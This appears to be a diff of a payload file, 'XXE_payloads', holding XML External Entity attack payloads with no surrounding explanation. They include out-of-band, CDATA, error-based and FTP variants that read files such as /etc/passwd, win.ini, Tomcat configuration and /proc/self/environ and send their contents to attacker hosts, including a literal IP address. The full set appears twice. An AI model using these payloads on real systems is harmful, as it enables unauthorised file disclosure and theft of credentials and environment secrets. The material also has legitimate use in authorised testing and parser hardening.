b00ls0ck3t · August 12, 2020 08:18
diff --git a/XXE_payloads b/XXE_payloads
 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
 <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
 ]>
 <r>&sp;</r>

 ---------------------------------------------------------------
 OoB extraction
 ---------------------------------------------------------------

 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
 <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
 %sp
 %param1
 ]>

 ## External dtd: ##

 <!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

 -----------------------------------------------------------------------
 OoB extra nice
 -----------------------------------------------------------------------

 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
 <!ENTITY % end "]]>">
 <!ENTITY % dtd SYSTEM "http://evil/evil.xml">
 %dtd;
 ]>
 <root>&all;</root>
 
 ## External dtd: ##
 
 <!ENTITY all "%start;%stuff;%end;">

 ------------------------------------------------------------------
 File-not-found exception based extraction
 ------------------------------------------------------------------

 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
  %one;
  %two;
  %four;
 ]>

 ## External dtd: ##

 <!ENTITY % three SYSTEM "file:///etc/passwd">
 <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

 --------------
 FTP
 --------------
 <?xml version="1.0" ?>
 <!DOCTYPE a [ 
 <!ENTITY % asd SYSTEM "http://46.101.180.57:4444/ext.dtd">
       %asd;
       %c;
 ]>
 <a>&rrr;</a>


 ## External dtd ##
 <!ENTITY % d SYSTEM "file:///proc/self/environ">
 <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://46.101.180.57:2121/%d;'>">
	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	---------------------------------------------------------------
	OoB extraction
	---------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
	%sp
	%param1
	]>

	## External dtd: ##

	<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
	<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

	-----------------------------------------------------------------------
	OoB extra nice
	-----------------------------------------------------------------------

	<?xml version="1.0" encoding="utf-8"?>
	<!DOCTYPE root [
	<!ENTITY % start "<![CDATA[">
	<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
	<!ENTITY % end "]]>">
	<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
	%dtd;
	]>
	<root>&all;</root>

	## External dtd: ##

	<!ENTITY all "%start;%stuff;%end;">

	------------------------------------------------------------------
	File-not-found exception based extraction
	------------------------------------------------------------------

	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE test [
	<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
	%one;
	%two;
	%four;
	]>

	## External dtd: ##

	<!ENTITY % three SYSTEM "file:///etc/passwd">
	<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

	--------------
	FTP
	--------------
	<?xml version="1.0" ?>
	<!DOCTYPE a [
	<!ENTITY % asd SYSTEM "http://46.101.180.57:4444/ext.dtd">
	%asd;
	%c;
	]>
	<a>&rrr;</a>


	## External dtd ##
	<!ENTITY % d SYSTEM "file:///proc/self/environ">
	<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://46.101.180.57:2121/%d;'>">